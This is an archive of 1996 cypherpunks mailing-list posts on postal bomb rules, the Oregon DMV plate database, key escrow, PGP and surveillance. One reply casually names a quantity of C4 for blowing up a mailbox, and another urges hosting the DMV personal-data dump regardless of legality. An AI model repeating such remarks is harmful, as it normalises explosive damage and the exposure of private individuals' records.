From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Mortimer <djmortim@sprynet.com>
Date: Fri, 9 Aug 1996 12:39:11 +0800
To: cypherpunks@toad.com
Subject: subscribing
Message-ID: <320A9782.2381@sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


Please add my name to your list.

Thanks.

D. Mortimer
djmortim@sprynet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 9 Aug 1996 15:13:38 +0800
To: cypherpunks@toad.com
Subject: Boom!
Message-ID: <2.2.32.19960808224330.00834cbc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


So, if it turns out that TWA 800 was an accidental wing tank explosion, will
they give us our civil liberties back?  If not, why not?

DCF

"'It Takes a Village to Raise a Child' -- an unemployed hausfrau living in
public housing in Washington, D.C."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Fri, 9 Aug 1996 13:23:59 +0800
To: cypherpunks@toad.com
Subject: Re: STEGO GUNS
In-Reply-To: <Pine.SUN.3.95.960808070140.18519C-100000@netcom4>
Message-ID: <199608090145.SAA05012@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 8 Aug 1996, jonathon <grafolog@netcom.com> wrote:
>On Wed, 7 Aug 1996 JonWienk@ix.netcom.com wrote:
>
>> In 1981, the city of Kennesaw, GA suffered 17 violent crimes and 55 
>> burglaries. 
>> In 1982, Kennesaw passed an ordinance requiring all city residents to own a 
>
>	Said ordinance being passed, as a protest against Elk Grove, IL
>	passing an orinance, banning handguns.  Anybody know when Elk
>	Grove revoked their ordinance?  Crime went down for six months
>	there [ Elk Grove ] after the ban was passed, then it went up
>	--- far surpassing previous crime levels, for all types of
>	crime. 

First of all, you are talking about Morton Grove, not Elk Grove.  Second of all, 
the ban was mostly ignored--the first year it was in effect, only 17 guns were 
turned in. The Morton Grove gun ban was not a statistically significant event.

Jonathan Wienke

"Today Americans would be outraged if U.N. troops entered Los Angeles to restore 
order; tomorrow they will be grateful! This is especially true if they were told 
there was an outside threat from beyond, whether real or promulgated, that 
threatened our very existence. It is then that all peoples of the world will 
pledge with world leaders to deliver them from this evil. The one thing every 
man fears is the unknown. When presented with this scenarios, individual rights 
will be willingly relinquished for the guarantee of their well being granted to 
them by their world government."
--Henry Kissinger in an address to the Bilderberg organization meeting at Evian, 
France, May 21, 1992. Transcribed from a tape recording made by one of the Swiss 
delegates.

"A conservative is a liberal who got mugged last night."
--Lee Rodgers

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 15:13:16 +0800
To: cypherpunks@toad.com
Subject: Re: Going Postal (Was: Boom!)
Message-ID: <ae2fef91080210040d06@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 AM 8/9/96, Mike Duvos wrote:

>
>The Post Office has now jumped on the terrorist bandwagon by
>announcing that it will no longer be legal to drop any package
>weighing over 16 ounces into a collection box.

Actually, CNN was reporting that this is for _airmail_ only. Which makes a
certain kind of sense, given the situation with bomb technology.

>Larger packages will have to be presented in person at the
>Post Office, and I wouldn't be surprised if several forms of
>ID were required.

The usual alternatives of UPS (cheaper) and FedEx (not so cheap) should
still be viable. This could actually boost their business.

I just had some Evil Smokeless Powder delivered to me via UPS. (The Post
Office people will not handle this stuff...it either violates their union
contracts or management is afraid the employees will use it to go postal
with.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Aug 1996 13:11:54 +0800
To: Rich Burroughs <cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608090231.TAA24652@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:50 AM 8/8/96 -0700, Rich Burroughs wrote:
>On Thu, 8 Aug 1996, Declan McCullagh wrote:
>
>> Looks like we're a little late. However, we can still grab the tape from
>> Oregon's DMV for $220. It would be an interesting excercise to try to get
>> these tapes from each state with similar provisions and put them all
>> online.
>
>This information has been available in Oregon for at least a couple of
>years on CD.  I've always been concerned about the privacy implications of
>that service -- perhaps that's the upside of this story?  That people do
>give a rat's ass about their privacy?

Actually, the lesson to be learned is that the news media is filled with a 
bunch of hypocrites.  These people are supposed to be REPORTERS, for god's 
sake.  Are they trying to tell us that they've never gone to the DMV and 
forked over $4 to find out the owner of a car?  Can you say, "investigative 
reporting"?

I think they're just carrying water for their friends who work for government.

>I do think that the information should be able to be disseminated on the
>Net as long as it's legal.

While I think that the information should be disseminated on the net 
REGARDLESS of whether "it's legal" in any particular jurisdiction.  Or, 
perhaps more accurately, I think that this information shouldn't be 
collected at all.  Then it couldn't be abused.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Cortes <lspeidel@earthlink.net>
Date: Fri, 9 Aug 1996 16:03:35 +0800
To: cypherpunks@toad.com
Subject: anarchy cookbook???
Message-ID: <320A86F3.22BC@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks

Ok this is what happend.I was looking around on the www. And came across 
the jolly roger "anarchy cookbook" and i was wondering.Any one know what 
happend to jolly roger? -Zac

ps:
Oh and sorry for like all fucken up on my last letter heh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Fri, 9 Aug 1996 14:40:21 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960809024936.00c79f48@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 8/8/96 -0700, Rich Graves wrote:
>On Thu, 8 Aug 1996, John F. Fricker wrote:
>
>> ObCypherpunks: How many people do you know that are working on a day to day
>> basis with medical records systems, the District Attorney's computers, your
>> doctor's computers, state Department of Health, and so on. I'm sure it's
>> come up before but isn't this an obvious of application of encryption and
>> PAK (Public Access to Keys)? Any legislation currently to _require_ that
>> medical records and such be encrypted with access restricted. 
>
>"Require"?
>
>Wouldn't do shit. It's a social problem more than a technological problem.
>

Isn't that the role of legislation? To implement solutions that society
would not do on it's own?

The enabling technology is obviously off the self.

I think you may have misinterpretted my last sentence which was supposed to
have had a ? at the end. Where's the proof reader when you need one!



--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 9 Aug 1996 11:20:36 +0800
To: Scott McGuire <svmcguir@syr.edu>
Subject: Re: appropriate algorithm for application
In-Reply-To: <ML-2.2.839513101.7349.scott@homebox.>
Message-ID: <320A29E7.13728473@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott McGuire wrote:
> 
> > Cerridwyn Llewyellyn wrote:
> > >
> > > I need an algorithm/protocol that is capable of encrypting numerous
> > > files with separate keys, but there also needs to be a master key
> > > that will be able to decrypt all of them.  Is there such a system
> > > that is relatively secure?  I'd prefer the system to be as secure
> > > as possible, but in this application, security is secondary to
> > > functionality.  Thanks... //cerridwyn//
> >
> > Are you after a working program, or just a design?
> >
> > You could always use an escrowed public key generator (discussed on
> > sci.crypt some time ago), where the keys all have a factor of 'N'
> > embedded in 'N', but encrypted with the master key.
> >
> > (I'd be prepared to write the code that generates the keys, if
> > someone does the "master decrypt" side of things).
> >
> >
> 
> Why not just encrypt the files with regular, single key encryption and only use
> the public-key encryption on a master file holding a copy of all the individual
> keys?  This would be faster right?

The main reason is so that anyone can generate new keys as and when
they please. The master key is not required for key generation, which
makes it more secure (ie. it spends more of its time in the safe) and
practical (the master key may be in a different building).

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Aug 1996 14:01:32 +0800
To: cypherpunks@toad.com
Subject: For what it's worth...
Message-ID: <F20csD58w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Erltsung Schang <etschang@zsu.edu.cn>
Subject: Could anyone feed me news?
Date: Thu, 08 Aug 1996 20:49:10 +0800
Organization: Network Center of Zhongshan University
Lines: 14
Message-ID: <3209E246.DE3@zsu.edu.cn>
Reply-To: etschang@zsu.edu.cn
NNTP-Posting-Host: 202.96.129.2
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 3.0b5aGold (Win95; I)

Hi,

Could anyone help me to feed me news?

Thank you very much!

Erltsung Schang
Network Center of Zhongshan University
135, West Xin-gang Road
Guangzhou, GD 510275
China
Phone: 86-20-84184905
Fax: 86-20-84193772
E-mail: etschang@zsu.edu.cn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Aug 1996 14:51:00 +0800
To: Pete Loshin <cypherpunks@toad.com>
Subject: Re: driver license info, loss of liberty, etc.
Message-ID: <199608090359.UAA29690@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:29 PM 8/8/96 -0400, Pete Loshin wrote:
>The furor over the Oregon DMV database seems a bit misplaced: this type of 
>information is considered to be in the public domain.  You can buy it on 
>tape/whatever for business purposes direct from the state.

Actually, in Oregon I don't think there is any restriction as to what purposes you ask 
for the information.  I've never filled out such a request before 
(preferring to get my data from a CDROM which tells no tales...) but as I 
understand it there's no restriction.  (Other than legality?!?)

> There are lots 
>of people who I don't want to have any information about me who can get 
>what's on file down at the Mass Registry of Motor Vehicles.  That's the way 
>it works.
>
>Now, there's lots of times when it would have been nice to have access to 
>that information myself.  Use your imagination.  Why should the public be 
>denied the right to access this information when businesses have had that 
>privilege for some time?  I wouldn't hold my breath waiting for it to be 
>taken away from businesses, either, though I suppose the states will now 
>pass laws prohibiting the public dissemination of this data.


I've pointed out elsewhere that our goal should be the elimination of the 
collection of this data by the state in the first place, an appropriately 
radical idea.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Aug 1996 15:12:28 +0800
To: cypherpunks@toad.com
Subject: Re: Boom!
Message-ID: <199608090359.UAA29693@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:58 PM 8/8/96 -0700, Timothy C. May wrote:
>At 10:43 PM 8/8/96, Duncan Frissell wrote:
>>So, if it turns out that TWA 800 was an accidental wing tank explosion, will
>>they give us our civil liberties back?  If not, why not?
>>
>
>You must be kidding. Civil rights (the real ones, not the affirmative
>action/antidiscrimination bullshit kind) only get constricted.
>
>The government only tightens the noose, it never loosens it.

I've got a...oh, never mind.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 9 Aug 1996 13:41:12 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Internal Passports
In-Reply-To: <Pine.LNX.3.93.960808101728.254H-100000@smoke.suba.com>
Message-ID: <Pine.SV4.3.91.960808211021.6108E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Nrth Carolina Jury instructions also mention that petite jurors are 
"discouraged" from asking questions of the witness. I guess that means 
they are not forbidden to do so.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 9 Aug 1996 14:56:40 +0800
To: nozefngr@mail.apple.com (CTH)
Subject: Re: Basic Unix Hacking
In-Reply-To: <199608082320.QAA17952@scv2.apple.com>
Message-ID: <199608090225.VAA10861@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


CTH wrote:
> Is there a way to get a .plan file to execute shell script when
> it is read by finger??
> 
> I'm sure this is an old question, but it seems there must
> be a way.
> 
> echo \"date\"  or some damn thing that will execute as opposed
> to printing.

use a named pipe for your plan: 

$ cd $HOME
$ /bin/mv -f .plan .plan.old
$ mknod .plan p
$ (date > .plan) &
$ finger `whoami`@0

or use "masterplan" program available from the net.

But IMHO, all this activity is a WASTE of time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 9 Aug 1996 12:16:18 +0800
To: "cypherpunks@toad.com>
Subject: driver license info, loss of liberty, etc.
Message-ID: <01BB8570.C231DE20@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


The furor over the Oregon DMV database seems a bit misplaced: this type of 
information is considered to be in the public domain.  You can buy it on 
tape/whatever for business purposes direct from the state.  There are lots 
of people who I don't want to have any information about me who can get 
what's on file down at the Mass Registry of Motor Vehicles.  That's the way 
it works.

Now, there's lots of times when it would have been nice to have access to 
that information myself.  Use your imagination.  Why should the public be 
denied the right to access this information when businesses have had that 
privilege for some time?  I wouldn't hold my breath waiting for it to be 
taken away from businesses, either, though I suppose the states will now 
pass laws prohibiting the public dissemination of this data.

BTW, has anyone heard about the Post Office now requiring that all airmail 
packages over 1 lb must now be posted in person (no mail drop boxes)? 
 Someone told me this, and it sounds just stupid and pointless enough to be 
true.  I won't have a chance to go to the PO until Monday, so I'd 
appreciate any updates.

regards,
-pl






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Fri, 9 Aug 1996 12:06:22 +0800
To: cypherpunks@toad.com
Subject: Fw: AOL crashes and burns
Message-ID: <199608090131.VAA02178@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Thu Aug 08 21:28:04 1996

- -----Begin Included Message ----- 
I thought things were a bit faster there for a while.. They had just rolled 
out AOL 3.0 in time for Mac World ( county ??) when it burned.... Seems 
some new server software gagged it <GRIN>


Date: Thu, 8 Aug 1996 15:16:38 -0500
 From: Warrior <warrior@tateonline.com>
To: cypherpunks@toad.com
Cc: 

Great news, eh?



- ---- End of forwarded message ----
Charles E. Sparks<sparks@bah.com>    
In God we trust, all others we encrypt !
http:/www.clark.net/pub/charley/index.htm
    Public Key At 
http://www.clark.net/pub/charley/cp_1.htm
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMgqUJeJ+JZd/Y4yVAQGXpQQMC4HvZJDaHYOeSF/2nw4LEdSt6g+h5eZU
NYo594LK9VTogbOLG/XgLol3aZ/GtQLyWs3gzbHFUwgByzZzjdDq+UEwbj4wV7jb
XE3D1EJ5zCg3k7+Pbj4LKqag4VngD/0yd38bx7Okcvi3pfuwaPjIjNy/IStxZjV8
L6tHPzdlbwwa2g==
=CG8R
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 9 Aug 1996 12:37:07 +0800
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <ae2f8d2303021004ed0d@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960808213912.6108M-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim,

THe "must have a gun" was a political-art statement; a rhetorical device.

I realize that you didn't recognize it as such, because there is never 
any inflammatory or posturing rhetoric on this list.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "i am not a number!" <geeman@best.com>
Date: Fri, 9 Aug 1996 14:36:50 +0800
To: cypherpunks@toad.com
Subject: Drive the SF Central Freeway, have your license plate photo'ed.
Message-ID: <320AC4B5.1E3@best.com>
MIME-Version: 1.0
Content-Type: text/plain


CBS radio news this morning: 80,000 commuters traveling the central 
f'way in SF will have information mailed to them regarding the quake 
retrofit blah blah.

How?  Their license plates have been photographed.
... and the cheery "news" anchorwoman sweetly moved on to the next 
story.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 9 Aug 1996 15:19:46 +0800
To: cypherpunks@toad.com
Subject: Re: Going Postal (Was: Boom!)
Message-ID: <v02120d1bae3075c377c7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:50 8/8/96, Mike Duvos wrote:

>The Post Office has now jumped on the terrorist bandwagon by
>announcing that it will no longer be legal to drop any package
>weighing over 16 ounces into a collection box.
>
>Larger packages will have to be presented in person at the
>Post Office, and I wouldn't be surprised if several forms of
>ID were required.

We'll see the day.

>Should wreak havoc with the mail order video tape rental business,
>with those handy pre-paid 4th class labels you just slap on the
>tapes before dropping in the nearest mailbox.

A video tape weighs less than a pound.

>I suspect one could do a lot of damage to a mailbox with under 16
>ounces of the proper explosive.  Perhaps one of our resident
>Cypherpunks bomb experts could expand on this subject.

Sixteen ounces of C4 will do you right. It was only 12 ounces that brought
down the Pan Am flight over Scotland.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 9 Aug 1996 15:22:07 +0800
To: cypherpunks@toad.com
Subject: Re: Going Postal (Was: Boom!)
Message-ID: <v02120d1cae3078480f83@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:22 8/8/96, Timothy C. May wrote:

>I just had some Evil Smokeless Powder delivered to me via UPS. (The Post
>Office people will not handle this stuff...it either violates their union
>contracts or management is afraid the employees will use it to go postal
>with.)

A while back, I ordered some "I love Explosives" bumper stickers from an
explosives dealer in New Mexico. They also ship black powder via UPS to
anyone. Twenty pounds maximum.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Aug 1996 17:43:23 +0800
To: cypherpunks@toad.com
Subject: Oregon DMV database:  "Needs a good home"
Message-ID: <199608090530.WAA04981@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


The Oregon DMV database needs a new home.  I've seen a few mentions of 
willing volunteers, but I've deleted the notes.  Could you re-send offers of 
interest to me?  Thanks.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 9 Aug 1996 14:01:46 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: visual programming
In-Reply-To: <199608081912.MAA29522@netcom14.netcom.com>
Message-ID: <199608090337.WAA15456@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Vladimir Z. Nuri wrote:
> 
> imagine that as a programmer, you could see an animated presentation
> of your code operation at all times. it would be an incredible
> development and debugging tool. it is quite a few years away, but
> I think it is inevitable.
> 

I can see it in my brain anyway. Would not pay a $1 for such system.

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 9 Aug 1996 16:53:45 +0800
To: cypherpunks@toad.com
Subject: Re: Going Postal (Was: Boom!)
In-Reply-To: <v02120d1bae3075c377c7@[192.0.2.1]>
Message-ID: <199608090539.WAA12675@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

>>Should wreak havoc with the mail order video tape rental business,
>>with those handy pre-paid 4th class labels you just slap on the
>>tapes before dropping in the nearest mailbox.

> A video tape weighs less than a pound.

Most video rental by mail places, like Facets or Movies Unlimited, 
rent up to three tapes at once, and use a single appropriately
sized box.  I suppose they will have to start packaging each
tape separately. 

The typical package one sends back to a book club when they ship
you the latest pulp fiction even though you sent the little card
back in time weighs about two pounds. 

But, as Tim points out, there's always UPS, or one of the other
services that will pick up at your door and is happy to have your
business. 

The Washington Post says...

"Reacting to growing concerns about mail bombs, the Postal Service
said yesterday that it is taking the extrordinary step of prohibiting
customers from depositing any stamped packages weighing 16 ounces or
more in its collection boxes.

"Posthamster General Marvin T. Runyon said the action was being
taken to 'enhance security measures and to protect the traveling
public, postal employees, and postal contractors who transport
US mail.'"

Persons who use postage meters and mail domestically are exempt
from the new rule. (!)

So I guess if the video place sends you a metered sticker for the
return postage, you can still drop the tapes in the box. 

I'm not quite sure what they are trying to accomplish, other than
to leap on the "we're doing our part to inconvenience the public over
terrorism" bandwagon. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Lee <chrislee@sunspot.tiac.net>
Date: Fri, 9 Aug 1996 14:40:28 +0800
To: cypherpunks@toad.com
Subject: PGP/Unix scripts, mail proggies?
Message-ID: <Pine.SUN.3.95.960808222342.27876A-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello all,

	I joined this list a while ago and am curious whether a there is a
simple way to encrypt/decrypt e-mail with PGP in a Linux(Unix)
enviroment...?  Sorry if this has been answered a thousand times, but it
would really make PGP a more viable option with my small ISP.

Thank you very much for any answers, please reply to me personally.

Chris Lee

PS Please don't suggest any Windows programs, excluding X-Windows of
course.  :)

	

===============================================================
|  chrislee@sunspot.tiac.net   |   Finger for PGP Public Key  |
|       "What color is a chameleon on a mirror?"  -BSD        |
|        WWW Page: http://www.tiac.net/users/chrislee         |
===============================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 9 Aug 1996 16:32:55 +0800
To: "i am not a number!" <cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.
Message-ID: <v02120d00ae30800991e5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:55 8/8/96, i am not a number! wrote:
>CBS radio news this morning: 80,000 commuters traveling the central
>f'way in SF will have information mailed to them regarding the quake
>retrofit blah blah.
>
>How?  Their license plates have been photographed.
>... and the cheery "news" anchorwoman sweetly moved on to the next
>story.....

You *are* making this up, right? Please say you did.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Aug 1996 16:16:11 +0800
To: cypherpunks@toad.com
Subject: Re: "Thank you for not smoking" and other euphemisms
In-Reply-To: <ae2fe17707021004bcfc@[205.199.118.202]>
Message-ID: <ZoHDsD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> "Petite jurors" Is this a typo, or a special term of art in North Carolina?

This is the official name for "regular" juries, as opposed to the grand jury.

> (And then there's the "sliding scale donation suggested," say, from $5 to
> $15. Presumably this is the embodiment of pure Marxist theory, "from each
> according to his ability, to each according to his need." Be interesting to
> see their reaction if one declined to make any donation.)

Well - some time ago I came to a C++ users group meeting and had only $2
on me. The guy at the door said rather sternly: "the suggested donation
is three dollars". I said, sorry, I only got two, and just walked by.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Aug 1996 15:03:25 +0800
To: cypherpunks@toad.com
Subject: Cybergangs?
Message-ID: <01I81T5ESZKS9JD3MN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu"  8-AUG-1996 22:27:27.58
To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"

>*****************************************************************
>Edupage, 8 August 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

>CYBERGANGS
>The head of the gang task force for the Arizona Department of Public Safety
>reports that a Web site established in Detroit offers a how-to guide for
>gangster wannabes and is urging gang members everywhere to unite under its
>umbrella to form the first cyberspace gang.  The official says:  "Now it's
>in your home, your living room, your den... Unfortunately, these guys can
>talk about anything they want and there's nothing law enforcement can do
>about it."  (Atlanta Journal-Constitution 8 Aug 96 F3)

	Umm... yes, it's called free speech. While organizational ability
might be a matter for concern, somehow I doubt that having them on the net
will do any real damage... being on a computer that mine is connected to hardly
puts them "in [my] home," even if my computer at home were connected to a phone
line. Bloody law enforcement paranoids...
	-Allen

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Abraham Lincoln (if your name is Abraham Lincoln;  otherwise, substitute
>your own name).  ...  To cancel, send a message to: listproc@educom.unc.edu
>with the message: unsubscribe edupage.   (If you have subscription problems,
>send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 16:22:30 +0800
To: cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.
Message-ID: <ae3023570a0210043726@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:55 AM 8/9/96, i am not a number! wrote:
>CBS radio news this morning: 80,000 commuters traveling the central
>f'way in SF will have information mailed to them regarding the quake
>retrofit blah blah.
>
>How?  Their license plates have been photographed.
>... and the cheery "news" anchorwoman sweetly moved on to the next
             ^^^^^^^^^^^^^^^^^^^^^^^^^
>story.....

Don't expect anchorbimbos to have a thought about anything. (*) Though it
might have given her more pause if the story was about how 80,000 women in
California are being mailed special information on birth control options
because their license plates were photographed in Planned Parenthood
parking lots....

It really ought to be illegal for any level of government to monitor
citizen-units this way, for any purpose. By the way, it also underscores
something we've talked about before: surveillance technology is moving so
fast that the Chaumian idea of avoiding movement-tracking by "digital cash"
may be impossible to achieve. You can spend your digibucks to avoid being
tracked on a toll road, but their cameras will see your (mandatory) license
plate and maybe even your face anyway.

--Tim


(* In the first "Robocop," anchorbimbo extraordinaire Leeza Gibbons, clone
of Mary Hart, did a wonderful satire of bubbleheaded hairspray
journalists.)




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 9 Aug 1996 16:13:24 +0800
To: cypherpunks@toad.com
Subject: Re: anarchy cookbook???
In-Reply-To: <320A86F3.22BC@earthlink.net>
Message-ID: <Pine.GUL.3.95.960808231233.8399A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Aug 1996, Michael Cortes wrote:

> cypherpunks
> 
> Ok this is what happend.I was looking around on the www. And came across 
> the jolly roger "anarchy cookbook" and i was wondering.Any one know what 
> happend to jolly roger?

He blew himself up cooking napalm according to his directions.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 16:33:37 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <ae30277d0b021004309f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:49 AM 8/9/96, John F. Fricker wrote:

>Isn't that the role of legislation? To implement solutions that society
>would not do on it's own?
>
>The enabling technology is obviously off the self.
>
>I think you may have misinterpretted my last sentence which was supposed to
>have had a ? at the end. Where's the proof reader when you need one!

"To implement solutions that society would not do on it's own?"

Would not do, or could not do? It is within anyone's power to ask their
psychiatrist what form of encryption he uses to protect his files. Likewise
with doctors and hospitals.

(Though I freely admit that one would not be likely to get very far. For at
least the next decade or two, the reaction will likely be "Huh?" But
"legislation" mandating a form of encryption is not the answer. For many
reasons.)

On this list at least, calls for passing laws to implement societal
solutions are not usually smiled upon. This is not to say such discussions
are out of bounds, only that you'd better make some persuasive arguments
and not just appeal to our common sense sympathies for social engineering
and more laws.

--Tim May

